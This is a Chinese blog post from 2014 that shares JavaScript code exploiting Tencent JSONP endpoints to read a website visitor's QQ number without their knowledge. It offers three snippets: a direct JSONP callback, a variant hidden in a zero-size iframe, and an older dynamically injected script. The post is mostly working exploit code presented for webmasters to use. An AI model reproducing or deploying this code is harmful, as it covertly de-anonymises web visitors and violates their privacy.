2014-06
22

腾讯斗地主漏洞:JS获取访客QQ号接口源代码


        现在有很多网站都实现了“使用QQ登录”的快捷登录方式,省去了用户注册的繁琐过程。然而大家都清楚,快捷登录时,腾讯并未返回给网站用户的QQ号码。导致网站站长只能给用户随机安排一个用户名了。近日,有网络高手爆料:腾讯斗地主漏洞:JS获取访客QQ号接口源代码桑三博客今天就给大家分享下。

 

       废话不多说,直接上贴源代码了!

XML/HTML代码
  1. <script>  
  2.     function aaa(obj){  
  3.         if(obj.uin != 0){  
  4.             alert("获取到QQ:"+obj.uin);  
  5.         }else{  
  6.             alert("未获取到QQ");  
  7.         }  
  8.     }  
  9.  </script>  
  10.  <script src="http://zf.huanle.qq.com/cgi-bin/hlddz_box/hlddz_silver_to_gold_box?callback=aaa"></script>  

 

         补充:
         有朋友说不跨域,且看如下代码:
 
XML/HTML代码
  1. <script>  
  2. window.qq276548160 = "<script>function aaa(obj){parent.qq(obj);}<\/script><script src='http://zf.huanle.qq.com/cgi-bin/hlddz_box/hlddz_silver_to_gold_box?callback=aaa'><\/script>";  
  3.  function qq(obj){  
  4.     if(obj.uin != 0){  
  5.             alert("获取到QQ:"+obj.uin);  
  6.         }else{  
  7.             alert("未获取到QQ");  
  8.         }  
  9.  }  
  10.  </script>  
  11.  <iframe src="javascript:parent.qq276548160;" scrolling="no" frameborder="0" style="width: 0px; height: 0px;"></iframe>  
         腾讯斗地主漏洞:JS获取访客QQ号接口源代码放出来了,具体怎么用,我就不多说了!
 
         下面是一段之前可用的网页获取QQ号码JSONP代码,可惜已经封了,这里也给大家分享下。
 
XML/HTML代码
  1. <!DOCTYPE html>  
  2. <html>  
  3. <head>  
  4.     <title>获取QQ</title>  
  5. </head>  
  6. <body>  
  7. <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />  
  8. <script type="text/javascript">  
  9.     function jC(result) {  
  10.         for(var i in result) {  
  11.             if(i=="uin"){  
  12.                 alert(result[i]);//循环输出a:1,b:2,etc.  
  13.             }  
  14.   
  15.         }  
  16.     }  
  17.     var JSONP=document.createElement("script");  
  18.     JSONP.type="text/javascript";  
  19.     JSONP.src="http://dir.minigame.qq.com/cgi-bin/yxs/GetYxsRegTime?callback=jC";  
  20.     document.getElementsByTagName("head")[0].appendChild(JSONP);  
  21. </script>  
  22. </body>  
  23. </html>  
 




上一篇: 快速备案专家告诉你网站备案的45个知识
下一篇: 无法删除文件,无法读源文件或磁盘的解决办法
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: 代码 技术
相关日志:
评论: 0 | 引用: 0 | 查看次数: -
发表评论
昵 称:
密 码: 游客发言不需要密码.
邮 箱: 邮件地址支持Gravatar头像,邮箱地址不会公开.
网 址: 输入网址便于回访.
内 容:
验证码:
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭